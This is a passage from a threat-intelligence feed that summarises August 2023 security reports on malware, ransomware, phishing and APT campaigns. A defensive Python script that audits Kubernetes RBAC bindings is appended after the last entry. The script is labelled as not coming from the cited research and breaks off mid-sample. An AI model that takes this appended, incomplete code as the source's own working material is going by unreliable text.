Source: https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/
2023-08-22
New_Variant_of_XLoader_macOS_Malware
LOW
+
Intel Source:
Sentinelone
Intel Name:
New_Variant_of_XLoader_macOS_Malware
Date of Scan:
2023-08-22
Impact:
LOW
Summary:
SentinelOne researchers have observed that a new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called OfficeNote.
Source: https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/
2023-08-22
CraxsRAT_and_CypherRAT_Created_by_EVLF_DEV
LOW
+
Intel Source:
Cyfirma
Intel Name:
CraxsRAT_and_CypherRAT_Created_by_EVLF_DEV
Date of Scan:
2023-08-22
Impact:
LOW
Summary:
The CYFIRMA research team has identified a new Malware-as-a-Service (MaaS) operator known as EVLF DEV. This threat actor is responsible for the development of CypherRAT and CraxsRAT, which have been purchased on a lifetime licence by over 100 different threat actors in the previous three years.
Source: https://www.cyfirma.com/outofband/unmasking-evlf-dev-the-creator-of-cypherrat-and-craxsrat/
2023-08-22
Chinese_APT_Targeting_Hong_Kong_in_Supply_Chain_Attack
LOW
+
Intel Source:
Symantec
Intel Name:
Chinese_APT_Targeting_Hong_Kong_in_Supply_Chain_Attack
Date of Scan:
2023-08-22
Impact:
LOW
Summary:
Symantec researchers have identified that an emerging China-backed advanced persistent threat group targeted organizations in Hong Kong in a supply chain attack that leveraged legitimate software to deploy the PlugX/Korplug backdoor.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse
2023-08-22
APT_Attack_Patterns_Targeting_Web_Services_of_Korean_Corporations
MEDIUM
+
Intel Source:
ASEC
Intel Name:
APT_Attack_Patterns_Targeting_Web_Services_of_Korean_Corporations
Date of Scan:
2023-08-22
Impact:
MEDIUM
Summary:
ASEC researchers have discovered APT attacks on Korean corporate web servers. The attackers exploit vulnerabilities to infiltrate and execute malicious actions. The report covers attack techniques such as privilege escalation, credential theft, and remote control using tools like Mimikatz, Potato, and NetCat. The attackers' objectives appear to evolve from ad insertion to potentially deploying ransomware.
Source: https://asec.ahnlab.com/en/56236/
2023-08-21
The_WoofLocker_Tech_Support_Campaign_is_Back
LOW
+
Intel Source:
Malwarebytes
Intel Name:
The_WoofLocker_Tech_Support_Campaign_is_Back
Date of Scan:
2023-08-21
Impact:
LOW
Summary:
Malwarebytes researchers have discovered that the WoofLocker tech support scam scheme has returned. The tactics and procedures are fairly similar, but the infrastructure has been strengthened to withstand future takedown attempts.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/08/wooflocker2
2023-08-21
System_BCMalware_Activity
LOW
+
Intel Source:
ISC.SANS
Intel Name:
System_BCMalware_Activity
Date of Scan:
2023-08-21
Impact:
LOW
Summary:
Researchers from SANS have analyzed the captured request /systembc/password.php. According to some references, this is likely the SystemBC Remote Access Trojan (RAT). All 4 IPs are part of the DigitalOcean ASN, and only one has been reported as likely malicious.
Source: https://isc.sans.edu/diary/SystemBC+Malware+Activity/30138/
2023-08-18
Mallox_Ransomware_Targeting_Unprotected_Microsoft_SQL_Servers
MEDIUM
+
Intel Source:
QuickHeal
Intel Name:
Mallox_Ransomware_Targeting_Unprotected_Microsoft_SQL_Servers
Date of Scan:
2023-08-18
Impact:
MEDIUM
Summary:
Researchers from QuickHeal have discovered that the Mallox (also known as TargetCompany) ransomware is presently using unprotected Microsoft SQL Servers as an attack vector to enter victims' systems and spread itself.
Source: https://blogs.quickheal.com/mallox-ransomware-strikes-unsecured-mssql-servers/
2023-08-18
StealC_Delivering_via_Deceptive_Google_Sheets
MEDIUM
+
Intel Source:
eSentire
Intel Name:
StealC_Delivering_via_Deceptive_Google_Sheets
Date of Scan:
2023-08-18
Impact:
MEDIUM
Summary:
Researchers at eSentire have discovered that a malicious advertisement, seen by the user while trying to download Google Sheets, was the infection's point of origin. This advertisement sent the visitor to a malicious website that hosted a downloader for the StealC infostealer.
Source: https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets
2023-08-18
HiatusRAT_Returns_To_Action_After_A_Short_Break
LOW
+
Intel Source:
Lumen
Intel Name:
HiatusRAT_Returns_To_Action_After_A_Short_Break
Date of Scan:
2023-08-18
Impact:
LOW
Summary:
Lumen researchers have continued to track the threat actor, resulting in new malware samples and infrastructure associated with the HiatusRAT cluster. In the latest campaign, they observed a shift in reconnaissance and targeting activity.
Source: https://blog.lumen.com/hiatusrat-takes-little-time-off-in-a-return-to-action/?utm_source=rss&utm_medium=rss&utm_campaign=hiatusrat-takes-little-time-off-in-a-return-to-action
2023-08-18
New_Tool_Deployed_by_Cuba_Ransomware
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
New_Tool_Deployed_by_Cuba_Ransomware
Date of Scan:
2023-08-18
Impact:
MEDIUM
Summary:
BlackBerry researchers have discovered and documented new tools used by the Cuba ransomware threat group. It is currently in the fourth year of its operation and shows no sign of slowing down. In the first half of 2023 alone, the operators behind Cuba ransomware were the perpetrators of several high-profile attacks across disparate industries.
Source: https://blogs.blackberry.com/en/2023/08/cuba-ransomware-deploys-new-tools-targets-critical-infrastructure-sector-in-the-usa-and-it-integrator-in-latin-america
2023-08-18
Diving_Deep_into_Darkrace_Ransomware
LOW
+
Intel Source:
QuickHeal
Intel Name:
Diving_Deep_into_Darkrace_Ransomware
Date of Scan:
2023-08-18
Impact:
LOW
Summary:
The incorporation of Lockbit's strategies into DarkRace demonstrates how cybercriminals are utilizing tried-and-true techniques to strengthen their attacks and increase damage. Combining these strategies could increase infections, compromise data, and escalate ransom demands.
Source: https://blogs.quickheal.com/darkrace-ransomware-a-deep-dive-into-its-techniques-and-impact/
2023-08-18
NoCry_and_Trash_Panda_Ransomware
LOW
+
Intel Source:
Fortinet
Intel Name:
NoCry_and_Trash_Panda_Ransomware
Date of Scan:
2023-08-18
Impact:
LOW
Summary:
Researchers from Fortinet looked into Trash Panda and a fresh, tiny NoCry ransomware strain. Windows-based malware called Trash Panda was initially discovered in the first few days of August. On infected computers, it encrypts files, changes the desktop background, and drops a ransom note with political statements. The Windows platform ransomware known as NoCry was first identified in April 2021. The creators of the NoCry ransomware produce variations that are then offered for sale on the group's Telegram channel.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-trash-panda-and-nocry-variant
2023-08-18
From_a_Zalando_Phishing_to_a_RAT
LOW
+
Intel Source:
ISC.SANS
Intel Name:
From_a_Zalando_Phishing_to_a_RAT
Date of Scan:
2023-08-18
Impact:
LOW
Summary:
ISC.SANS researchers have seen a bunch of phishing emails targeting Zalando customers.
Source: https://isc.sans.edu/diary/From+a+Zalando+Phishing+to+a+RAT/30136/
2023-08-17
Malicious_Campaign_Targeting_GitLab
LOW
+
Intel Source:
Sysdig
Intel Name:
Malicious_Campaign_Targeting_GitLab
Date of Scan:
2023-08-17
Impact:
LOW
Summary:
The Sysdig Threat Research Team has discovered a new, financially motivated operation, dubbed LABRAT. This operation set itself apart from others due to the attacker’s emphasis on stealth and defense evasion in their attacks.
Source: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
2023-08-17
A_new_phishing_campaign_targeting_Zimbra_users
LOW
+
Intel Source:
Welivesecurity
Intel Name:
A_new_phishing_campaign_targeting_Zimbra_users
Date of Scan:
2023-08-17
Impact:
LOW
Summary:
ESET researchers have uncovered a mass-spreading phishing campaign aimed at collecting the credentials of Zimbra account users, active since at least April 2023 and still ongoing. Zimbra Collaboration is an open-core collaborative software platform and a popular alternative to enterprise email solutions. The campaign's targets are a variety of small and medium businesses and governmental entities. According to ESET telemetry, the greatest number of targets are located in Poland, followed by Ecuador and Italy. To date, ESET has not attributed this campaign to any known threat actor.
Source: https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/
2023-08-17
Gozi_Malware_Launches_Another_Attack
LOW
+
Intel Source:
IBM Security Intelligence
Intel Name:
Gozi_Malware_Launches_Another_Attack
Date of Scan:
2023-08-17
Impact:
LOW
Summary:
Researchers at IBM Security Intelligence have noticed that the Gozi malware has returned and is now focusing on cryptocurrency platforms, banks, and other financial institutions.
Source: https://securityintelligence.com/posts/gozi-strikes-again-targeting-banks-cryptocurrency-and-more/
2023-08-17
Massive_phishing_campaign_targets_energy_sector
MEDIUM
+
Intel Source:
Security Affairs
Intel Name:
Massive_phishing_campaign_targets_energy_sector
Date of Scan:
2023-08-17
Impact:
MEDIUM
Summary:
Since May 2023, researchers from Cofense have observed a large phishing campaign that uses QR codes to steal users' Microsoft credentials across multiple industries. One of the targeted organizations is a notable US energy company.
Source: https://securityaffairs.com/149567/hacking/phishing-campaign-qr-codes.html?amp=1
2023-08-16
Hakuna_Matata_ransomware
LOW
+
Intel Source:
ASEC
Intel Name:
Hakuna_Matata_ransomware
Date of Scan:
2023-08-16
Impact:
LOW
Summary:
ASEC researchers recently discovered the Hakuna Matata ransomware being used in attacks on Korean companies. Hakuna Matata is a recent strain, first identified on Twitter in July 2023; later that month, a dark-web post by a threat actor using Hakuna Matata was also shared on Twitter. Among the samples uploaded to VirusTotal, the file uploaded on July 2nd, 2023 is confirmed to be the earliest case.
Source: https://asec.ahnlab.com/en/56010/
2023-08-16
The_Shadow_Nexus_of_Malware_and_Proxy_Application
MEDIUM
+
Intel Source:
AT&T
Intel Name:
The_Shadow_Nexus_of_Malware_and_Proxy_Application
Date of Scan:
2023-08-16
Impact:
MEDIUM
Summary:
Researchers from AT&T Alien Labs found a significant campaign distributing a proxy server application to Windows computers. They also identified a proxy service provider whose proxy requests are forwarded through compromised systems that malware has turned into residential exit nodes.
Source: https://cybersecurity.att.com/blogs/labs-research/proxynation-the-dark-nexus-between-proxy-apps-and-malware
2023-08-16
Amadey_Bot_leveraged_by_LummaC_Stealer_to_Deploy_SectopRAT
LOW
+
Intel Source:
Cyble
Intel Name:
Amadey_Bot_leveraged_by_LummaC_Stealer_to_Deploy_SectopRAT
Date of Scan:
2023-08-16
Impact:
LOW
Summary:
Cyble researchers recently came across a novel approach for spreading SectopRAT: the LummaC stealer retrieves the Amadey bot, which in turn delivers the SectopRAT payload.
Source: https://cyble.com/blog/lummac-stealer-leveraging-amadey-bot-to-deploy-sectoprat/
2023-08-16
QwixxRAT_aka_Telegram_RAT
LOW
+
Intel Source:
Uptycs
Intel Name:
QwixxRAT_aka_Telegram_RAT
Date of Scan:
2023-08-16
Impact:
LOW
Summary:
The Uptycs researchers discovered QwixxRAT (aka Telegram RAT) in early August 2023. The threat actor is widely distributing their malicious tool through Telegram and Discord platforms. Once installed on the victim’s Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker's Telegram bot, providing them with unauthorized access to the victim's sensitive information.
Source: https://www.uptycs.com/blog/remote-access-trojan-qwixx-telegram
2023-08-16
Raccoon_Stealer_Malware_Returns
LOW
+
Intel Source:
Cyberint
Intel Name:
Raccoon_Stealer_Malware_Returns
Date of Scan:
2023-08-16
Impact:
LOW
Summary:
Cyberint researchers have seen that the developers of Raccoon Stealer information-stealing malware have ended their 6-month hiatus from hacker forums to promote a new 2.3.0 version of the malware to cyber criminals. It is one of the most well-known and widely used information-stealing malware families, having been around since 2019, sold via a subscription model for $200/month to threat actors.
Source: https://cyberint.com/blog/financial-services/raccoon-stealer/
2023-08-16
Phishing_Campaign_Steals_Cloud_Credentials
MEDIUM
+
Intel Source:
Netskope
Intel Name:
Phishing_Campaign_Steals_Cloud_Credentials
Date of Scan:
2023-08-16
Impact:
MEDIUM
Summary:
Over the last couple of months, Netskope Threat Labs analysts have been monitoring a 61-fold increase in traffic to phishing pages hosted on Cloudflare R2. Most of the campaigns target Microsoft login credentials, although some pages target Adobe, Dropbox, and other cloud apps. The attacks have mainly targeted victims in North America and Asia, across different segments, led by the technology, financial services, and banking sectors.
Source: https://www.netskope.com/blog/evasive-phishing-campaign-steals-cloud-credentials-using-cloudflare-r2-and-turnstile
2023-08-16
The_rise_of_LLM_engines_WormGPT_and_FraudGPT
LOW
+
Intel Source:
Trustwave
Intel Name:
The_rise_of_LLM_engines_WormGPT_and_FraudGPT
Date of Scan:
2023-08-16
Impact:
LOW
Summary:
Trustwave researchers discuss two such LLM engines that were offered for sale on underground forums, WormGPT and FraudGPT. If criminals gain their own ChatGPT-like tool, the implications for cybersecurity, social engineering, and overall digital safety could be severe. This prospect highlights the importance of staying vigilant in securing, and responsibly developing, artificial intelligence technology in order to mitigate potential risks and safeguard against misuse.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/wormgpt-and-fraudgpt-the-rise-of-malicious-llms/ https://netenrich.com/blog/fraudgpt-the-villain-avatar-of-chatgpt
2023-08-15
NetSupportRAT_exploring_new_techniques
LOW
+
Intel Source:
Trellix
Intel Name:
NetSupportRAT_exploring_new_techniques
Date of Scan:
2023-08-15
Impact:
LOW
Summary:
Trellix researchers observed a new campaign using fake Chrome browser updates to trick victims into installing the remote administration tool NetSupport Manager. The threat actors abuse this software to steal information and take control of victims' computers. The campaign resembles the previously reported SocGholish campaign, which was run by a suspected Russian threat actor.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/new-techniques-of-fake-browser-updates.html
2023-08-15
Stealthy_Malicious_MSI_Loader
LOW
+
Intel Source:
Cyfirma
Intel Name:
Stealthy_Malicious_MSI_Loader
Date of Scan:
2023-08-15
Impact:
LOW
Summary:
Cyfirma researchers observed a Stealthy MSI Loader advertised on dark web forums by a Russian threat actor, with claims that it can evade detection by both VirusTotal scans and Windows Defender. Their investigation also established a link between this MSI Loader and the BatLoader campaign observed in March 2023, suggesting coordination between these threats.
Source: https://www.cyfirma.com/outofband/stealthy-malicious-msi-loader-overlapping-technique-and-infrastructure-with-batloader/
2023-08-15
The_malware_campaigns_use_a_variety_of_programming_languages
LOW
+
Intel Source:
HP ThreatResearch
Intel Name:
The_malware_campaigns_use_a_variety_of_programming_languages
Date of Scan:
2023-08-15
Impact:
LOW
Summary:
Over the last couple of months, the HP Threat Research team has noticed a surge of finance-themed malicious spam campaigns spreading malware through batch scripts (.bat). The campaigns use a wide variety of programming languages to achieve different objectives within the infection chain, from batch scripts and PowerShell to Go, shellcode and .NET.
Source: https://threatresearch.ext.hp.com/do-you-speak-multiple-languages-malware-does/
2023-08-15
Continues_OSS_Supply_Chain_Attacks_Hidden_in_the_Python_Package
LOW
+
Intel Source:
Fortinet
Intel Name:
Continues_OSS_Supply_Chain_Attacks_Hidden_in_the_Python_Package
Date of Scan:
2023-08-15
Impact:
LOW
Summary:
The Python Package Index (PyPI) has become a common place for threat actors to publish malware that unsuspecting users may download. FortiGuard Labs analysts have been monitoring this attack vector for some time and published an update on the zero-day attacks they have discovered; recently, using their AI-assisted detection engine, they found several new zero-day PyPI attacks.
Source: https://www.fortinet.com/blog/threat-research/continued-oss-supply-chain-attacks-hidden-in-pypi
2023-08-14
Unraveling_a_New_Threat_Targeting_LATAM_FinTech_Users
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
Unraveling_a_New_Threat_Targeting_LATAM_FinTech_Users
Date of Scan:
2023-08-14
Impact:
MEDIUM
Summary:
JanelaRAT, a newly discovered cyber threat, has been unveiled by Zscaler ThreatLabz. Primarily focused on the Latin American (LATAM) financial sector, this sophisticated malware employs advanced techniques including DLL side-loading and dynamic command and control infrastructure. With capabilities ranging from evasive maneuvers to self-defense mechanisms, the threat aims to compromise sensitive financial data. The malware's origins are suggested by Portuguese strings in its code and a Portuguese-speaking developer, highlighting its targeted region and intentions.
Source: https://www.zscaler.com/blogs/security-research/janelarat-repurposed-bx-rat-variant-targeting-latam-fintech
2023-08-14
Monti_Ransomware_Group_Resumes_Attacks_with_New_Linux_Variant
MEDIUM
+
Intel Source:
Trendmicro
Intel Name:
Monti_Ransomware_Group_Resumes_Attacks_with_New_Linux_Variant
Date of Scan:
2023-08-14
Impact:
MEDIUM
Summary:
Trend Micro researchers observed that the Monti ransomware group, which resembles Conti, has resumed attacks on the legal and government sectors with a new Linux variant. Unlike previous versions, this variant modifies encryption methods, uses an infection marker, and alters system files.
Source: https://www.trendmicro.com/en_us/research/23/h/monti-ransomware-unleashes-a-new-encryptor-for-linux.html
2023-08-14
Phishing_Attack_Targeting_Government_Agencies
MEDIUM
+
Intel Source:
CERT UA
Intel Name:
Phishing_Attack_Targeting_Government_Agencies
Date of Scan:
2023-08-14
Impact:
MEDIUM
Summary:
CERT-UA has identified a phishing attack on government agencies involving fraudulent emails, purporting to come from CERT-UA, that urge a password change through a malicious link. The attackers imitate Roundcube's interface and use a deceptive subdomain.
Source: https://cert.gov.ua/article/5455833
2023-08-14
New_Magento_Campaign_Discovered_called_Xurum
LOW
+
Intel Source:
Akamai
Intel Name:
New_Magento_Campaign_Discovered_called_Xurum
Date of Scan:
2023-08-14
Impact:
LOW
Summary:
Over the past few months, Akamai has closely monitored a focused campaign targeting a relatively small number of Magento deployments. They dubbed the campaign Xurum after the domain name of the attacker's C2 server.
Source: https://www.akamai.com/blog/security-research/new-sophisticated-magento-campaign-xurum-webshell
2023-08-14
Updates_on_SEASPY_and_WHIRLPOOL_Backdoors
MEDIUM
+
Intel Source:
CISA
Intel Name:
Updates_on_SEASPY_and_WHIRLPOOL_Backdoors
Date of Scan:
2023-08-14
Impact:
MEDIUM
Summary:
The US Cybersecurity and Infrastructure Security Agency (CISA) has published an analysis report on malware recovered from compromised Barracuda Email Security Gateway (ESG) appliances. CISA obtained four malware samples, including the SEASPY and WHIRLPOOL backdoors. The appliances were compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting ESG versions 5.1.3.001 through 9.2.0.006.
Source: https://www.cisa.gov/news-events/analysis-reports/ar23-221a
2023-08-12
The_SugarCRM_CVE_2023_22952_zero_day_vulnerability
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
The_SugarCRM_CVE_2023_22952_zero_day_vulnerability
Date of Scan:
2023-08-12
Impact:
MEDIUM
Summary:
A zero-day vulnerability in the SugarCRM customer relationship management platform was used by threat actors to gain access to customers' AWS accounts, according to a report from Palo Alto Networks Unit 42.
Source: https://unit42.paloaltonetworks.com/sugarcrm-cloud-incident-black-hat/
2023-08-12
A_new_cybercriminals_service_called_Dark_Utilities
MEDIUM
+
Intel Source:
SOCRadar
Intel Name:
A_new_cybercriminals_service_called_Dark_Utilities
Date of Scan:
2023-08-12
Impact:
MEDIUM
Summary:
As reported by SOCRadar, Cisco Talos observed malware samples in the wild using the Dark Utilities service to establish C2 communication channels and remote access capabilities on infected systems. The malware leveraging Dark Utilities targeted both Windows and Linux systems.
Source: https://socradar.io/dark-utilities-platform-provides-c2-server-for-threat-actors/
2023-08-12
The_surge_in_malware_cases_linked_to_a_Gootloader_payload_delivery
LOW
+
Intel Source:
Sucuri
Intel Name:
The_surge_in_malware_cases_linked_to_a_Gootloader_payload_delivery
Date of Scan:
2023-08-12
Impact:
LOW
Summary:
This month, analysts traced a noticeable surge in malware cases linked to the malicious payload delivery system known as Gootloader. The group behind it is believed to run a malware-as-a-service operation, exclusively providing a delivery service for other threat actors. The blog discusses why Gootloader is so effective, goes into the details of its inner workings, and sheds light on the tactics employed by its operators.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/gootloader-why-your-legal-document-search-may-end-in-misery/
2023-08-11
Hybrid_malware_leveraging_various_internet_protocols
LOW
+
Intel Source:
Sucuri
Intel Name:
Hybrid_malware_leveraging_various_internet_protocols
Date of Scan:
2023-08-11
Impact:
LOW
Summary:
Sucuri analysts periodically discover unique hybrid malware that leverages various internet protocols. During a recent investigation, they found an interesting piece of JavaScript malware that indirectly uses the DNS protocol to obtain redirect URLs.
Source: https://blog.sucuri.net/2023/08/from-google-dns-to-tech-support-scam-sites-unmasking-the-malware-trail.html
2023-08-11
In_Depth_Analysis_of_LOLKEK_Payloads
LOW
+
Intel Source:
Sentinelone
Intel Name:
In_Depth_Analysis_of_LOLKEK_Payloads
Date of Scan:
2023-08-11
Impact:
LOW
Summary:
Researchers from SentinelLabs have examined sets of LOLKEK payload samples. Small and medium-sized businesses (SMBs) and individual users are typically the main targets.
Source: https://www.sentinelone.com/blog/lolkek-unmasked-an-in-depth-analysis-of-new-samples-and-evolving-tactics/
2023-08-11
Changes_in_CHM_Malware_Distribution
LOW
+
Intel Source:
ASEC
Intel Name:
Changes_in_CHM_Malware_Distribution
Date of Scan:
2023-08-11
Impact:
LOW
Summary:
ASEC has previously reported on a CHM malware type impersonating Korean financial institutes and insurance companies. Recently, the execution method of this malware has been changing every week. The ASEC post covers how the changed execution processes of the CHM malware are recorded in AhnLab's EDR products.
Source: https://asec.ahnlab.com/en/55972/
2023-08-11
The_Most_Recent_STRRAT_Version_Contains_Dual_Obfuscation_Layers
LOW
+
Intel Source:
Cyble
Intel Name:
The_Most_Recent_STRRAT_Version_Contains_Dual_Obfuscation_Layers
Date of Scan:
2023-08-11
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs has discovered a fresh infection method used to spread STRRAT. The approach disseminates STRRAT version 1.6, which makes use of two string obfuscation techniques.
Source: https://cyble.com/blog/strrats-latest-version-incorporates-dual-obfuscation-layers/
2023-08-11
Common_TTPs_of_attacks_against_industrial_organizations
LOW
+
Intel Source:
Kaspersky
Intel Name:
Common_TTPs_of_attacks_against_industrial_organizations
Date of Scan:
2023-08-11
Impact:
LOW
Summary:
Kaspersky ICS CERT analysts identified over 15 implants and their variants planted by the threat actor(s) in various combinations. The attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems. Analysts have medium to high confidence that the threat actor known as APT31, also known as Judgment Panda and Zirconium, is behind the activities described in the report.
Source: https://ics-cert.kaspersky.com/publications/reports/2023/08/10/common-ttps-of-attacks-against-industrial-organizations-implants-for-uploading-data/
2023-08-11
MoustachedBouncer_cyberespionage_activity_against_diplomats
LOW
+
Intel Source:
WeliveSecurity
Intel Name:
MoustachedBouncer_cyberespionage_activity_against_diplomats
Date of Scan:
2023-08-11
Impact:
LOW
Summary:
MoustachedBouncer is a cyberespionage group, active since at least 2014, that ESET Research has tracked targeting foreign diplomats in Belarus. ESET researchers believe that MoustachedBouncer uses a lawful interception system (such as SORM) to conduct its adversary-in-the-middle (AitM) operations.
Source: https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/
2023-08-11
Attackers_Using_Freezers_And_SYK_Crypter_to_Distribute_Malware
LOW
+
Intel Source:
Fortinet
Intel Name:
Attackers_Using_Freezers_And_SYK_Crypter_to_Distribute_Malware
Date of Scan:
2023-08-11
Impact:
LOW
Summary:
Researchers from FortiGuard Labs have discovered a new Rust-written injector (Freeze.rs) that can inject XWorm and shellcode into a victim's environment. Their investigation also showed a sharp rise in injector activity in May 2023. To evade antivirus detection, the shellcode can be encrypted with AES or RC4, compressed with LZMA, and Base64-encoded.
Source: https://www.fortinet.com/blog/threat-research/malware-distributed-via-freezers-and-syk-crypter
2023-08-11
Zero_Day_Exploit_Case_Study_CVE_2023_36874
MEDIUM
+
Intel Source:
CrowdStrike
Intel Name:
Zero_Day_Exploit_Case_Study_CVE_2023_36874
Date of Scan:
2023-08-11
Impact:
MEDIUM
Summary:
In July 2023, the CrowdStrike Falcon Complete team observed an exploit for a previously unknown vulnerability in the Windows Error Reporting (WER) component. CrowdStrike reported its findings on the new vulnerability to Microsoft, which assigned it the identifier CVE-2023-36874.
Source: https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
2023-08-11
Unknown_Actor_Using_DroxiDat_and_Cobalt_Strike
LOW
+
Intel Source:
Securelist
Intel Name:
Unknown_Actor_Using_DroxiDat_and_Cobalt_Strike
Date of Scan:
2023-08-11
Impact:
LOW
Summary:
Securelist researchers have seen a new SystemBC variant deployed to a critical infrastructure target. This time, the proxy-capable backdoor was deployed alongside Cobalt Strike beacons in a South African nation’s critical infrastructure.
Source: https://securelist.com/focus-on-droxidat-systembc/110302/
2023-08-11
Campaign_Against_NATO_Aligned_Foreign_Ministries
MEDIUM
+
Intel Source:
Eclecticiq
Intel Name:
Campaign_Against_NATO_Aligned_Foreign_Ministries
Date of Scan:
2023-08-11
Impact:
MEDIUM
Summary:
Two PDF documents have been spotted, and EclecticIQ researchers believe with high confidence that they are a part of a continuous campaign aimed at NATO member countries' foreign ministries. The PDF files contained two fake diplomatic invitations that appeared to be coming from the German embassy.
Source: https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs
2023-08-10
AdLoad_Turns_Mac_Systems_into_Proxy_Exit_Nodes
LOW
+
Intel Source:
AT&T
Intel Name:
AdLoad_Turns_Mac_Systems_into_Proxy_Exit_Nodes
Date of Scan:
2023-08-10
Impact:
LOW
Summary:
AT&T Alien Labs has seen thousands of IPs acting as proxy exit nodes in a way consistent with AdLoad-infected systems. This activity may indicate that tens of thousands of Mac computers have been compromised and used as proxy exit nodes. Over the past year, at least 150 samples have been seen in the wild.
Source: https://cybersecurity.att.com/blogs/labs-research/mac-systems-turned-into-proxy-exit-nodes-by-adload
2023-08-10
Attackers_Using_EvilProxy_Phishing_Kit
HIGH
+
Intel Source:
Proofpoint
Intel Name:
Attackers_Using_EvilProxy_Phishing_Kit
Date of Scan:
2023-08-10
Impact:
HIGH
Summary:
Threat actors have been using the phishing toolkit EvilProxy to take control of cloud-based Microsoft 365 accounts belonging to executives at prominent companies. Researchers said the attacks demonstrate both the prevalence of pre-packaged phishing-as-a-service toolkits and the increasing bypass of multi-factor authentication to gain access to accounts.
Source: https://www.proofpoint.com/us/blog/email-and-cloud-threats/cloud-account-takeover-campaign-leveraging-evilproxy-targets-top-level
2023-08-10
Magniber_Ransomware_Injection
LOW
+
Intel Source:
ASEC
Intel Name:
Magniber_Ransomware_Injection
Date of Scan:
2023-08-10
Impact:
LOW
Summary:
Magniber ransomware continues to be distributed in high volume. For the past few years it was distributed through an Internet Explorer vulnerability, but since the browser's support ended, that vulnerability is no longer exploited. Recently, the ransomware has started spreading via the Chrome and Edge browsers using filenames impersonating Windows security update packages (such as ERROR.Center.Security.msi). Currently, Magniber injects the ransomware into a running process, which then encrypts the user's files.
Source: https://asec.ahnlab.com/en/55961/
2023-08-10
Tax_Invoices_and_Shipping_Statements_Posing_as_GuLoader_Malware
LOW
+
Intel Source:
ASEC
Intel Name:
Tax_Invoices_and_Shipping_Statements_Posing_as_GuLoader_Malware
Date of Scan:
2023-08-10
Impact:
LOW
Summary:
Researchers from ASEC have discovered cases in which GuLoader was sent as an email attachment disguised as shipping bills and tax invoices. The newly discovered GuLoader variant was packed inside a RAR archive. When run by a user, GuLoader ultimately downloads well-known malware strains including Remcos, AgentTesla, and Vidar.
Source: https://asec.ahnlab.com/en/55978/
2023-08-09
New_InfoStealer_Named_Statc_Stealer
LOW
+
Intel Source:
Zscaler
Intel Name:
New_InfoStealer_Named_Statc_Stealer
Date of Scan:
2023-08-09
Impact:
LOW
Summary:
Zscaler ThreatLabz researchers have discovered a new information stealer family called Statc Stealer. It is a sophisticated malware that infects devices powered by Windows, gains access to computer systems, and steals sensitive information.
Source: https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
2023-08-09
Kubernetes_Exposed
LOW
+
Intel Source:
Aquasec
Intel Name:
Kubernetes_Exposed
Date of Scan:
2023-08-09
Impact:
LOW
Summary:
A hijacked Kubernetes (k8s) cluster can be a disaster on a massive scale. Aquasec researchers uncovered Kubernetes clusters belonging to more than 350 organizations, open-source projects, and individuals that were openly accessible and largely unprotected. At least 60% of them had been breached and had an active campaign deploying malware and backdoors.
Source: https://blog.aquasec.com/kubernetes-exposed-one-yaml-away-from-disaster
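The exposures above come down to misconfiguration, so the first check a practitioner would want is a local audit of RBAC bindings. The script below is an added example, not code from the Aqua post; it assumes the input is the JSON that `kubectl get clusterrolebindings -o json` produces (a List whose items carry `subjects` and `roleRef`), and the sample document embedded in it is constructed for illustration. It flags any binding that hands a role to `system:anonymous` or `system:unauthenticated`, and any high-privilege role bound to the catch-all `system:authenticated` group, while skipping the read-only `system:public-info-viewer` binding that every cluster ships with.

```python
"""Flag ClusterRoleBindings that expose roles to anonymous or catch-all subjects.

Added example; not code from the Aqua research. Assumes `kubectl get
clusterrolebindings -o json` output. The sample document below is constructed.
"""
import json

# Subjects that resolve to callers presenting no credentials at all.
ANONYMOUS_SUBJECTS = {
    ("User", "system:anonymous"),
    ("Group", "system:unauthenticated"),
}
# Any holder of any valid token (every service account included).
BROAD_SUBJECTS = {("Group", "system:authenticated")}
# Roles whose grant to an anonymous or broad subject is an immediate problem.
HIGH_RISK_ROLES = {"cluster-admin", "admin", "edit"}
# Default binding shipped with Kubernetes; it only exposes endpoints such as /version.
KNOWN_DEFAULT_BINDINGS = {"system:public-info-viewer"}


def risky_bindings(kubectl_json):
    """Return findings for bindings that expose a role to anonymous or broad subjects."""
    doc = json.loads(kubectl_json)
    findings = []
    for item in doc.get("items", []):
        name = item["metadata"]["name"]
        if name in KNOWN_DEFAULT_BINDINGS:
            continue
        role = item.get("roleRef", {}).get("name", "")
        for subj in item.get("subjects") or []:
            key = (subj.get("kind"), subj.get("name"))
            if key in ANONYMOUS_SUBJECTS:
                # Anything reachable without credentials is worth a look; admin roles are critical.
                severity = "critical" if role in HIGH_RISK_ROLES else "high"
            elif key in BROAD_SUBJECTS and role in HIGH_RISK_ROLES:
                severity = "high"
            else:
                continue
            findings.append({"binding": name, "role": role, "subject": key[1], "severity": severity})
    return findings


# Constructed sample: two normal bindings and two misconfigurations.
SAMPLE_KUBECTL_JSON = json.dumps({
    "kind": "List",
    "items": [
        {   # Default binding present in every cluster.
            "metadata": {"name": "system:public-info-viewer"},
            "roleRef": {"kind": "ClusterRole", "name": "system:public-info-viewer"},
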